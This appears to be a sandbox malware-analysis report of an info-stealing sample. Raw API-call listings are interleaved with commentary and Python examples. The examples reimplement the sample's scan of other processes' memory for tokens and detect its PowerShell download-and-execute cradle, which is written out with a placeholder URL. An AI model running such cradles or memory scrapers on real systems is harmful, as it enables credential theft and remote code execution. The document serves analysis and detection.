                                              • Part of subcall function 02469E17: GetProcAddress.KERNEL32(006D72B8,006D6AB0), ref: 02469F95
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
                                              • Part of subcall function 02451437: ExitProcess.KERNEL32 ref: 02451478
                                              • Part of subcall function 024513C7: GetSystemInfo.KERNEL32(?), ref: 024513D1
                                              • Part of subcall function 024513C7: ExitProcess.KERNEL32 ref: 024513E5
                                              • Part of subcall function 02451377: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 02451392
                                              • Part of subcall function 02451377: VirtualAllocExNuma.KERNEL32(00000000), ref: 02451399
                                              • Part of subcall function 02451377: ExitProcess.KERNEL32 ref: 024513AA
                                              • Part of subcall function 02451487: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 024514A5
                                              • Part of subcall function 02451487: __aulldiv.LIBCMT ref: 024514BF
                                              • Part of subcall function 02451487: __aulldiv.LIBCMT ref: 024514CD
                                              • Part of subcall function 02451487: ExitProcess.KERNEL32 ref: 024514FB
                                              • Part of subcall function 02466C77: GetUserDefaultLangID.KERNEL32 ref: 02466C7B
                                              • Part of subcall function 024513F7: ExitProcess.KERNEL32 ref: 0245142D
                                              • Part of subcall function 02467C47: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0245141E), ref: 02467C77
                                              • Part of subcall function 02467C47: RtlAllocateHeap.NTDLL(00000000), ref: 02467C7E
                                              • Part of subcall function 02467C47: GetUserNameA.ADVAPI32(00000104,00000104), ref: 02467C96
                                              • Part of subcall function 02467CD7: GetProcessHeap.KERNEL32(00000000,00000104), ref: 02467D07
                                              • Part of subcall function 02467CD7: RtlAllocateHeap.NTDLL(00000000), ref: 02467D0E
                                              • Part of subcall function 02467CD7: GetComputerNameA.KERNEL32(?,00000104), ref: 02467D26
                                              • Part of subcall function 0246AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0246AF3C
                                              • Part of subcall function 0246AF27: lstrcpy.KERNEL32(00000000), ref: 0246AF7B
                                              • Part of subcall function 0246AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0246AF89
                                              • Part of subcall function 0246AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0246AE7C
                                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,006D6F40,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 02466FD1
                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 02466FEF
                                            • CloseHandle.KERNEL32(00000000), ref: 02467000
                                            • Sleep.KERNEL32(00001770), ref: 0246700B
                                            • CloseHandle.KERNEL32(?,00000000,?,006D6F40,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 02467021
                                            • ExitProcess.KERNEL32 ref: 02467029
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                            • String ID:
                                            • API String ID: 2525456742-0
                                            APIs
                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
                                            • GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
                                            • LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
                                            • ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
                                            • LocalFree.KERNEL32(00410447), ref: 0040A1E0
                                            • CloseHandle.KERNEL32(000000FF), ref: 0040A1EA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                            • String ID:
                                            • API String ID: 2311089104-0
                                            APIs
                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0245A3A3
                                            • GetFileSizeEx.KERNEL32(000000FF,?), ref: 0245A3C8
                                            • LocalAlloc.KERNEL32(00000040,?), ref: 0245A3E8
                                            • ReadFile.KERNEL32(000000FF,?,00000000,024516F6,00000000), ref: 0245A411
                                            • LocalFree.KERNEL32(024516F6), ref: 0245A447
                                            • CloseHandle.KERNEL32(000000FF), ref: 0245A451
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                            • String ID:
                                            • API String ID: 2311089104-0
                                            APIs
                                            • __getptd.LIBCMT ref: 0041CD1A
                                              • Part of subcall function 0041C2A0: __getptd_noexit.LIBCMT ref: 0041C2A3
                                              • Part of subcall function 0041C2A0: __amsg_exit.LIBCMT ref: 0041C2B0
                                            • __amsg_exit.LIBCMT ref: 0041CD3A
                                            • __lock.LIBCMT ref: 0041CD4A
                                            • InterlockedDecrement.KERNEL32(?), ref: 0041CD67
                                            • free.MSVCRT ref: 0041CD7A
                                            • InterlockedIncrement.KERNEL32(0042C558), ref: 0041CD92
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                            • String ID:
                                            • API String ID: 634100517-0
                                            APIs
                                            • __getptd.LIBCMT ref: 0246CF81
                                              • Part of subcall function 0246C507: __getptd_noexit.LIBCMT ref: 0246C50A
                                              • Part of subcall function 0246C507: __amsg_exit.LIBCMT ref: 0246C517
                                            • __amsg_exit.LIBCMT ref: 0246CFA1
                                            • __lock.LIBCMT ref: 0246CFB1
                                            • InterlockedDecrement.KERNEL32(?), ref: 0246CFCE
                                            • free.MSVCRT ref: 0246CFE1
                                            • InterlockedIncrement.KERNEL32(0042C980), ref: 0246CFF9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                            • String ID:
                                            • API String ID: 634100517-0
                                            • Opcode ID: 230712e3deecaa92b850b6e343f5c0a0bb14ee3de3d18a069ed343d21a6d6265
                                            • Instruction ID: a936627510a88f38c97d6a994d583d9665089f077a1209e401caa04268c8473f
                                            • Opcode Fuzzy Hash: 230712e3deecaa92b850b6e343f5c0a0bb14ee3de3d18a069ed343d21a6d6265
                                            • Instruction Fuzzy Hash: 56015E31A01621EFCB25AB6AD88CB7EB7A1BF08718F04411BE855E76C0C7246941CFD7
                                            APIs
                                            • strlen.MSVCRT ref: 0041719F
                                            • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,0041741A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 004171CD
                                              • Part of subcall function 00416E50: strlen.MSVCRT ref: 00416E61
                                              • Part of subcall function 00416E50: strlen.MSVCRT ref: 00416E85
                                            • VirtualQueryEx.KERNEL32(0041758D,00000000,?,0000001C), ref: 00417212
                                            • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041741A), ref: 00417333
                                              • Part of subcall function 00417060: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00417078
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: strlen$MemoryProcessQueryReadVirtual
                                            • String ID: @
                                            • API String ID: 2950663791-2766056989
                                            • Opcode ID: fb37d5dfae784a160399b72835e1c1bb9686aa045b5c8bb6ae6988575cdfbf40
                                            • Instruction ID: d4c246fcbb90b677cbfa603dc812bd51b07a2c71a26f71c1c9cdc23e16c3c5e2
                                            • Opcode Fuzzy Hash: fb37d5dfae784a160399b72835e1c1bb9686aa045b5c8bb6ae6988575cdfbf40
                                            • Instruction Fuzzy Hash: CD5106B5E04109EBDB08CF98D981AEFB7B6BF88300F148159F915A7340D738AA41DBA5
                                            APIs
                                            • strlen.MSVCRT ref: 02467406
                                            • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,02467681,00000000,00420BB0,00000000,00000000), ref: 02467434
                                              • Part of subcall function 024670B7: strlen.MSVCRT ref: 024670C8
                                              • Part of subcall function 024670B7: strlen.MSVCRT ref: 024670EC
                                            • VirtualQueryEx.KERNEL32(024677F4,00000000,?,0000001C), ref: 02467479
                                            • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02467681), ref: 0246759A
                                              • Part of subcall function 024672C7: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 024672DF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: strlen$MemoryProcessQueryReadVirtual
                                            • String ID: @
                                            • API String ID: 2950663791-2766056989
                                            • Opcode ID: fb37d5dfae784a160399b72835e1c1bb9686aa045b5c8bb6ae6988575cdfbf40
                                            • Instruction ID: e4935f7195b8e8733ab3982db5eca99059a4e36fee1dde345a1797f77888d2bf
                                            • Opcode Fuzzy Hash: fb37d5dfae784a160399b72835e1c1bb9686aa045b5c8bb6ae6988575cdfbf40
                                            • Instruction Fuzzy Hash: F851F5B1E00119EBDB04CF99D985ABFB7B6FF88304F10855AF919A7240D735EA41CBA1
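The two listings above (at 0041719F in the on-disk image and 02467406 in the unpacked copy at 02450000, same Opcode ID) are one routine: it walks a target process with VirtualQueryEx and reads each region through ReadProcessMemory in 0x64000-byte pieces, searching for the 43-byte argument passed in hex. Those hex bytes are the ASCII string `eyAidHlwIjogIkpXVCIsICJhbGciOiAiRWREU0EiIH0`, which is base64 for the token header `{ "typ": "JWT", "alg": "EdDSA" }`; the sample is scraping another process's memory for tokens. The following is an added example written for this report, not Stealc's code and not Joe Sandbox output: the same chunked scan with the two Windows calls replaced by a constructed in-memory "process", so the logic (including a match that straddles a chunk boundary, and skipping of PAGE_NOACCESS regions) can be run anywhere. The region layout, protections and contents are made up.

```python
"""Chunked process-memory scan for a fixed needle (added example, see lead-in)."""
import base64
import json

# The hex bytes the report shows being passed to the scan routine, copied verbatim.
NEEDLE_HEX = ("65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 "
              "62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30")
NEEDLE = bytes.fromhex(NEEDLE_HEX)   # ASCII: eyAidHlwIjogIkpXVCIsICJhbGciOiAiRWREU0EiIH0
CHUNK = 0x64000                      # ReadProcessMemory size visible in the report

MEM_COMMIT, MEM_FREE = 0x1000, 0x10000
PAGE_NOACCESS, PAGE_READWRITE, PAGE_GUARD = 0x01, 0x04, 0x100
UNREADABLE = PAGE_NOACCESS | PAGE_GUARD


def decode_needle(needle: bytes) -> dict:
    """The needle is base64 of a JSON token header; decode it to see what is being hunted."""
    padded = needle + b"=" * (-len(needle) % 4)
    return json.loads(base64.b64decode(padded))


class FakeProcess:
    """Constructed stand-in for a process handle: regions are (base, size, state, protect, data)."""

    def __init__(self, regions):
        self.regions = sorted(regions, key=lambda r: r[0])

    def virtual_query(self, addr):
        """Like VirtualQueryEx: (base, size, state, protect) of the region holding addr,
        a synthetic MEM_FREE region for a gap, None once past the last mapping."""
        next_base = None
        for base, size, state, protect, _ in self.regions:
            if base <= addr < base + size:
                return base, size, state, protect
            if base > addr and (next_base is None or base < next_base):
                next_base = base
        if next_base is None:
            return None
        return addr, next_base - addr, MEM_FREE, 0

    def read(self, addr, length):
        """Like ReadProcessMemory: bytes from one region, None if the read would fail."""
        for base, size, state, protect, data in self.regions:
            if base <= addr < base + size:
                if state != MEM_COMMIT or protect & UNREADABLE:
                    return None
                off = addr - base
                return bytes(data[off:off + length])
        return None


def scan_process(proc, needle: bytes, max_addr: int = 0x7FFF0000) -> list:
    """Absolute address of every occurrence of needle in readable, committed memory.

    Regions are read in CHUNK-sized pieces; the last len(needle)-1 bytes of each
    piece are carried over so a match straddling two pieces is still found."""
    hits, addr, overlap = [], 0, len(needle) - 1
    while addr < max_addr:
        info = proc.virtual_query(addr)
        if info is None:
            break
        base, size, state, protect = info
        end = base + size
        if state == MEM_COMMIT and not protect & UNREADABLE:
            tail, pos = b"", base
            while pos < end:
                data = proc.read(pos, min(CHUNK, end - pos))
                if not data:
                    break
                buf = tail + data
                start = 0
                while (i := buf.find(needle, start)) != -1:
                    hits.append(pos - len(tail) + i)   # buf[0] lives at pos - len(tail)
                    start = i + 1
                tail = buf[-overlap:] if overlap else b""
                pos += len(data)
        addr = end
    return hits


def build_sample_process() -> FakeProcess:
    """Constructed layout: a gap, a read-write region holding the needle twice (once across
    the chunk boundary), and a PAGE_NOACCESS region that also holds it but must be skipped."""
    rw = bytearray(2 * CHUNK)
    rw[100:100 + len(NEEDLE)] = NEEDLE
    rw[CHUNK - 10:CHUNK - 10 + len(NEEDLE)] = NEEDLE
    noaccess = bytearray(0x1000)
    noaccess[0:len(NEEDLE)] = NEEDLE
    return FakeProcess([
        (0x10000, len(rw), MEM_COMMIT, PAGE_READWRITE, rw),
        (0x10000 + len(rw), len(noaccess), MEM_COMMIT, PAGE_NOACCESS, noaccess),
    ])


if __name__ == "__main__":
    print("needle decodes to", decode_needle(NEEDLE))
    print("hits:", [hex(a) for a in scan_process(build_sample_process(), NEEDLE)])
```

The carried-over tail is the part that is easy to get wrong when reimplementing this for a hunt tool: a scanner that reads fixed-size pages and searches each one independently misses any token split across the boundary.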
                                            APIs
                                            • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00406E7A), ref: 00406A69
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID: zn@$zn@
                                            • API String ID: 1029625771-1156428846
                                            • Opcode ID: 3fc5a8dedeb49d1d19b08a8b2b74cc72c2b475cc3767d007be69e7bc9d832ffb
                                            • Instruction ID: 56bd16fc9bcf92c18956b4b249a59c76870f8c01999fa8d2962da2cd55bb9a52
                                            • Opcode Fuzzy Hash: 3fc5a8dedeb49d1d19b08a8b2b74cc72c2b475cc3767d007be69e7bc9d832ffb
                                            • Instruction Fuzzy Hash: C571D874A04109DFDB04CF48C494BAAB7B1FF88305F158179E84AAF395C739AA91CF95
                                            APIs
                                            • lstrcat.KERNEL32(?,006D6D0C), ref: 02464C92
                                              • Part of subcall function 024691D7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02469202
                                            • lstrcat.KERNEL32(?,00000000), ref: 02464CB8
                                            • lstrcat.KERNEL32(?,?), ref: 02464CD7
                                            • lstrcat.KERNEL32(?,?), ref: 02464CEB
                                            • lstrcat.KERNEL32(?,006D6C84), ref: 02464CFE
                                            • lstrcat.KERNEL32(?,?), ref: 02464D12
                                            • lstrcat.KERNEL32(?,006D6CC8), ref: 02464D26
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
                                              • Part of subcall function 02469187: GetFileAttributesA.KERNEL32(00000000,?,02451DFB,?,?,00425784,?,?,00420E22), ref: 02469196
                                              • Part of subcall function 02464A27: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 02464A37
                                              • Part of subcall function 02464A27: RtlAllocateHeap.NTDLL(00000000), ref: 02464A3E
                                              • Part of subcall function 02464A27: wsprintfA.USER32 ref: 02464A5D
                                              • Part of subcall function 02464A27: FindFirstFileA.KERNEL32(?,?), ref: 02464A74
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                            • String ID:
                                            • API String ID: 2540262943-0
                                            • Opcode ID: 91df7f0c7e554cb1d3044ee6f87cd087b154477ead0d8d2d1c74f8365ca17e83
                                            • Instruction ID: 55f6ad779f5e29749a0cfdd8cc5f0caa71f690b9e6e404e48ce86a3959aad8a0
                                            • Opcode Fuzzy Hash: 91df7f0c7e554cb1d3044ee6f87cd087b154477ead0d8d2d1c74f8365ca17e83
                                            • Instruction Fuzzy Hash: EB3123B6E0025867DB14F7B0DC88EE9733AAF58700F44469EB65596090EA7497CC8FA1
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                              • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                            • ShellExecuteEx.SHELL32(0000003C), ref: 00412FD5
                                            Strings
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412F54
                                            • ')", xrefs: 00412F03
                                            • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412F14
                                            • <, xrefs: 00412F89
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                            • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            • API String ID: 3031569214-898575020
                                            • Opcode ID: ceff6c1b0c5b41120544c3d3be6942fd96f27d98ecc1bbdb5468e056c7fe4573
                                            • Instruction ID: fa4238ec13a9909d2a06eabaeedbec9afd3c4d5d27ba3f2f176ac5e057c61c04
                                            • Opcode Fuzzy Hash: ceff6c1b0c5b41120544c3d3be6942fd96f27d98ecc1bbdb5468e056c7fe4573
                                            • Instruction Fuzzy Hash: DB415E70E011089ADB04EFA1D866BEDBB79AF10314F40445EF10277196EF782AD9CF99
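The strings in the listing above are the pieces of a PowerShell download-and-execute cradle: `C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe` (the 32-bit host, because the sample is itself 32-bit) followed by `-nop -c "iex(New-Object Net.WebClient).DownloadString('` and `')"`, concatenated with lstrcat around a URL the report does not show and handed to ShellExecuteEx. This is the behaviour behind the "Yara detected Powershell download and execute" signature. The following is an added example written for this report, not Stealc's code and not Joe Sandbox output: detection logic for that cradle run over constructed process-creation events shaped like Sysmon Event ID 1 (Image, CommandLine, ParentImage). The URLs and parent paths in the events are placeholders. It goes beyond the page in one respect: it also unpacks the `-EncodedCommand` form of the same cradle, which this sample does not use.

```python
"""Detection of the PowerShell download cradle (added example, see lead-in)."""
import base64
import binascii
import re

POWERSHELL = ("\\powershell.exe", "\\pwsh.exe")
INTERACTIVE_PARENTS = ("\\explorer.exe", "\\cmd.exe", "\\powershell.exe", "\\pwsh.exe",
                       "\\windowsterminal.exe")

DOWNLOAD_RE = re.compile(r"Net\.WebClient|DownloadString|DownloadFile|DownloadData|"
                         r"Invoke-WebRequest|Invoke-RestMethod|\b(?:iwr|irm|curl|wget)\b", re.I)
EXEC_RE = re.compile(r"\biex\b|Invoke-Expression", re.I)
NOPROFILE_RE = re.compile(r"(?:^|\s)-nop\w*", re.I)   # -nop, -noprofile and the prefixes PowerShell accepts
ENCODED_RE = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})", re.I)


def effective_command_line(cmdline: str) -> str:
    """Expand -EncodedCommand (base64 of UTF-16LE) so both spellings are matched the same way."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return cmdline
    return cmdline[:m.start()] + " " + decoded


def analyze(event: dict):
    """Return (is_cradle, reasons). A cradle needs a download primitive and in-memory
    execution in the same PowerShell command line; the other reasons only add confidence."""
    image = event.get("Image", "").lower()
    if not image.endswith(POWERSHELL):
        return False, []
    cmd = effective_command_line(event.get("CommandLine", ""))
    reasons = []
    if DOWNLOAD_RE.search(cmd):
        reasons.append("download primitive")
    if EXEC_RE.search(cmd):
        reasons.append("in-memory execution (iex)")
    if NOPROFILE_RE.search(cmd):
        reasons.append("-nop")
    if "\\syswow64\\" in image:
        reasons.append("32-bit PowerShell (spawned by a 32-bit process)")
    parent = event.get("ParentImage", "").lower()
    if parent and not parent.endswith(INTERACTIVE_PARENTS):
        reasons.append("non-interactive parent " + parent.rsplit("\\", 1)[-1])
    is_cradle = "download primitive" in reasons and "in-memory execution (iex)" in reasons
    return is_cradle, reasons


# ---- constructed events; the URLs and parent paths are placeholders ----
PS32 = "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe"
PS64 = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
CRADLE = "iex(New-Object Net.WebClient).DownloadString('http://placeholder.invalid/stage.ps1')"
ENCODED = base64.b64encode(CRADLE.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    # the command line this sample builds, as it would appear in a process-creation event
    {"Image": PS32, "ParentImage": "C:\\Users\\user\\Desktop\\XJQkTVvJ3I.exe",
     "CommandLine": f'"{PS32}" -nop -c "{CRADLE}"'},
    # the same cradle hidden behind -EncodedCommand
    {"Image": PS64, "ParentImage": "C:\\Users\\user\\AppData\\Local\\Temp\\dropper.exe",
     "CommandLine": f'"{PS64}" -NoP -W Hidden -Enc {ENCODED}'},
    # benign: -NoProfile alone is not a cradle
    {"Image": PS64, "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": f'"{PS64}" -NoProfile -Command Get-Process | Sort-Object CPU'},
    # benign-ish: a download to disk without in-memory execution
    {"Image": PS64, "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": f'"{PS64}" -c "Invoke-WebRequest https://placeholder.invalid/tool.zip -OutFile tool.zip"'},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        flagged, why = analyze(ev)
        print("CRADLE" if flagged else "ok    ", ev["CommandLine"][:70], why)
```

Matching on `-nop` or on the SysWOW64 path alone would be noisy; the pairing of a download primitive with `iex` in one command line is the signal, and the 32-bit host plus an unusual parent are what turn a match into a priority alert.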
                                            APIs
                                              • Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                            • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 004151CA
                                            • lstrcatA.KERNEL32(?,00421058), ref: 004151E7
                                            • lstrcatA.KERNEL32(?,009C9670), ref: 004151FB
                                            • lstrcatA.KERNEL32(?,0042105C), ref: 0041520D
                                              • Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414B7C
                                              • Part of subcall function 00414B60: FindFirstFileA.KERNEL32(?,?), ref: 00414B93
                                              • Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC4), ref: 00414BC1
                                              • Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414BD7
                                              • Part of subcall function 00414B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00414DCD
                                              • Part of subcall function 00414B60: FindClose.KERNEL32(000000FF), ref: 00414DE2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                            • String ID: cA
                                            • API String ID: 2667927680-2872761854
                                            • Opcode ID: a663d27af1db11ea6e0538481b6c1ec1bf0866bdd2edd05cd7ef4aaec1a8ff54
                                            • Instruction ID: dc16e4b81abbfe3fe676fda19ddb0faac8fab1e973e0b9c2e11f24d889f851c9
                                            • Opcode Fuzzy Hash: a663d27af1db11ea6e0538481b6c1ec1bf0866bdd2edd05cd7ef4aaec1a8ff54
